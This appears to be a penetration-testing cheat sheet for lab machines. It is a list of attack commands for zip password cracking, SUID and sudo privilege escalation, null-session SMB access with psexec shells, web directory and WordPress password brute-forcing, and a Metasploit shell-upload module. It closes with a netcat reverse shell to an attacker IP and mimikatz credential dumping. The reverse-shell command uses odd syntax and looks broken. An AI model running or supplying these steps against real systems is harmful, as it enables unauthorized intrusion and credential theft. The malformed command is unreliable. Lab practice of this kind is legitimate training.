1. Crack the password of a zip archive

zip2john backup.zip > passwd.txt
john passwd.txt

2. Find

  1. Find files with the SUID bit set
find / -perm -u=s 2>/dev/null

If a SUID binary turns up, check GTFOBins to see whether that binary can be used for privilege escalation.

  2. Find files owned by a particular group
find / -type f -group bugtracker 2>/dev/null

  3. Find a file by name
# linux
find / -name "user.txt" 2>/dev/null
# powershell
Get-ChildItem -Path C:\ -Recurse -Filter user.txt -ErrorAction SilentlyContinue

3. SMB

If port 445 is open on the target, list its shares without authentication (null session):

smbclient -N -L //<ip>

then connect to a share and download a file:

smbclient -N //10.10.10.27/backup
get filename

Once we have a username and password, get a shell with Impacket's psexec.py:

python3 psexec.py administrator@10.10.10.27

4. Upgrade Shell to tty

SHELL=/bin/bash script -q /dev/null
# or
python3 -c "import pty;pty.spawn('/bin/bash')"

5. Sudo

List the commands the current user is allowed to run with sudo:

sudo -l

If one of those commands can spawn a shell, run it with sudo and use it to open a root shell.

For example, :!/bin/bash from inside Vim.

6. Website

Brute-force directories:

gobuster dir -u http://10.10.10.29 -w /usr/share/wordlists/dirb/big.txt

Scan for common web server issues:

nikto -host http://10.10.10.28 -o _28.html

WordPress

Enumerate users and brute-force their passwords:

wpscan --url http://10.10.10.29/wordpress --enumerate
wpscan --url http://10.10.10.29/wordpress -U users.txt -P backupPasswords

Or use the Metasploit module:

use exploit/unix/webapp/wp_admin_shell_upload

NetCat

Reverse shell from the target:

nc.exe -a "-e cmd.exe 10.10.16.4 7777"

Listener on the attacking machine (the port must match the one in the connect-back command):

nc -lvnp 7777

Dump cached credentials (Windows):

./mimikatz.exe